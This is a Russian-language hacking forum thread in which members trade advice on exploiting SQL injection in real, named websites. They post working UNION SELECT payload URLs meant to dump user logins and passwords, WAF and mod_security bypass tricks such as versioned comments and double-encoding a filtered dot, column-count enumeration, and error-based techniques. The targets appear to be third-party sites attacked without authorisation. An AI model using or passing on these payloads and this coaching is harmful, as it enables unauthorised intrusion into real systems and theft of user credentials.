Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    А вы не думали, что information_schema просто недоступна для этого юзера, не?
     
  2. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108

    Не будьте голословны, аргументируйте свое утверждение по поводу кодов ошибки рабочими примерами реквестов



    Дело в том что запос падает на любом вхождении SELECT, наверняка как-то можно обойти<
     
    #23462 Cennarios, 11 Aug 2014
    Last edited: 11 Aug 2014
  3. Shade

    Shade Member

    Joined:
    8 Sep 2010
    Messages:
    37
    Likes Received:
    10
    Reputations:
    12
    начал раскручивать скулю.. и столкнулся с такой проблемой


    нашел 3 интерисующих меня стобца:

    usr_login
    usr_name
    usr_pass

    При запросе:

    Code:
    http://encycl.anthropology.ru/article.php?id=-1+union+select+1,concat(usr_login,0x3a,usr_pass),3,4,5,6,7,8,9,10+from+user+--+
    Ничего не выводит.

    А при запросе:

    Code:
    http://encycl.anthropology.ru/article.php?id=-1+union+select+1,concat(usr_login,0x3a,usr_name),3,4,5,6,7,8,9,10+from+user+--+
    Выводит имя и логин пользователей(включая админа).

    Вопрос: Получается вывод паролей как-то защищен? Как вывести пароль?
     
  4. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    Колонка usr_pass просто пуста.
     
  5. ninja96c

    ninja96c New Member

    Joined:
    29 Sep 2010
    Messages:
    8
    Likes Received:
    3
    Reputations:
    1
    PHP:
    $data=array_reverse(explode("\x22",mysql_real_escape_string(substr($data,strpos($data,"\x22")+1))));
    и далее
    PHP:
    UPDATE users SET data='$data[1]'
    Есть вариант пихнуть что-то такое, чтобы можно было обойти экранирование кавычек и провести SQL-инжект?
     
  6. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    Есть одна инъекция.
    Code:
    /-1'+union+select+1,2,3,4,user(),6,7,8,9,10+--+
    Отлично выводит пользователя.

    Code:
    -1'+union+select+1,2,3,4,user,6,7,8,9,10+from+mysql.user+--+
    Ответ - 404 Not Found

    Тогда я подумал подставить валидное значение

    Code:
    -45742'+union+select+1,2,3,4,user,6,7,8,9,10+from+mysql.user+--+
    Ответ - 404 Not Found

    Все дальнейшие запросы кроме user(), database(), version() отвечают ошибкой 404.
    Тогда я подумал что это WAF. И загрязнил запрос стандартными комментариями.
    Ответ - 404 Not Found

    Вообще любые запросы отвечают 404.

    Что это может быть?
     
  7. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Попробуй использовать подзапросы.
     
    _________________________
  8. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    Может быть, конечно, криво использовал select и подзапросы, но всё равно ответ был 404.

    Code:
    http://www.awards.ib-bank.ru/participant/-1'+union+select+1,2,3,4,5,6,7,8,9,10+--+
    В общем вот инъекция сама. Тут вывод полей как видно.
    Я первый раз сталкиваюсь с этим.
    Конечно это может быть и WAF'ом, которому и комментарии нипочем (Всё-таки сайт посвящён ИБ банков).
     
    #23468 MaxFast, 12 Aug 2014
    Last edited: 12 Aug 2014
  9. Shade

    Shade Member

    Joined:
    8 Sep 2010
    Messages:
    37
    Likes Received:
    10
    Reputations:
    12
    Такой вопрос.. хотел посмотреть как работает сканер Jsky, ввел сайт, все норм.. вообщем он насканил file backup check, искал на форуме ну ничего не нашел((( хотел бы попросить ссылочку (если такова имеется) где было бы про эту уязвимость побольше информации и чтоб было написанно как её использовать..хотябы вкраце. Буду очень благодарен
     
  10. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    Ничего примечательного. Возможно бэкап файла обыкновенный.
     
  11. billybonse

    billybonse Member

    Joined:
    9 Oct 2011
    Messages:
    55
    Likes Received:
    7
    Reputations:
    1
    Мужики, такой вопрос.
    Вроде бы обошел mod_security, в итоге такой запрос:
    http://www.xxxxx.com/checkout.php?id=-39+/*!50000UNION*/+/*!50000SELECT*/+1,table_name,3,4,5,6,7,8,9,10,11+/*5000FROM*/+information_schema,tables+/*50000LIMIT*/+0,1--

    Выдает ошибку "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0,1--' at line 1"

    Что я неправильно сделал?
     
  12. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    http://www.xxxxx.com/checkout.php?id=-39+/*!50000UNION*/+/*!50000SELECT*/+1,table_name,3,4,5,6,7,8,9,10,11+/*5000FROM*/+information_schema,tables+/*50000LIMIT*/+0,1--

    Запятая вместо точки.
     
  13. billybonse

    billybonse Member

    Joined:
    9 Oct 2011
    Messages:
    55
    Likes Received:
    7
    Reputations:
    1
    такая же фигня, когда ставлю точку.
     
  14. billybonse

    billybonse Member

    Joined:
    9 Oct 2011
    Messages:
    55
    Likes Received:
    7
    Reputations:
    1
    И еще вопрос (Простите нуба, только учусь, вопросов миллион)
    Кручю скулю:
    /shop.php?cid=34+union+select+1,2,3,4,5--
    ошибка The used SELECT statements have a different number of columns
    /shop.php?cid=34+union+select+1,2,3,4,5,6--
    ошибка -
    Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in /home/totalbha/public_html/shop/index.php on line 32
    error in counting subcategory data :-The used SELECT statements have a different number of columns

    При увеличении опять пишет, что неверное кол-во колонок. В чем ошибка и как ее обойти?
     
  15. Shade

    Shade Member

    Joined:
    8 Sep 2010
    Messages:
    37
    Likes Received:
    10
    Reputations:
    12

    Попробуй перебрать через order+by
     
  16. billybonse

    billybonse Member

    Joined:
    9 Oct 2011
    Messages:
    55
    Likes Received:
    7
    Reputations:
    1
    вообще безпонтово. ошибка
    Error in fetching category data :-You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' union order by 20-- and status='yes' order by id DESC limit 0,8' at line 1

    и по увеличению...
     
  17. Shade

    Shade Member

    Joined:
    8 Sep 2010
    Messages:
    37
    Likes Received:
    10
    Reputations:
    12
    А минус ставить не пробовал??
     
  18. billybonse

    billybonse Member

    Joined:
    9 Oct 2011
    Messages:
    55
    Likes Received:
    7
    Reputations:
    1
    пробовал. та же хрень.
     
  19. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    http://www.awards.ib-bank.ru/participant/-1'+union+select+1,2,3,4,5,6,7,table_name,9,10+from+information_schema%252etables+--+

    Фильтруется точка


    Через error based крути
     
    _________________________
  20. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    Ошибка синтаксиса - это ошибка синтаксиса, проверяйте запрос.

    В коде два или более запросов подряд с разным числом колонок. Вы подбираете к первому запросу нужное количество, но оно не подходит к следующим. Крутите другие векторы, к примеру уже упомянутый error-based.
     
Thread Status:
Not open for further replies.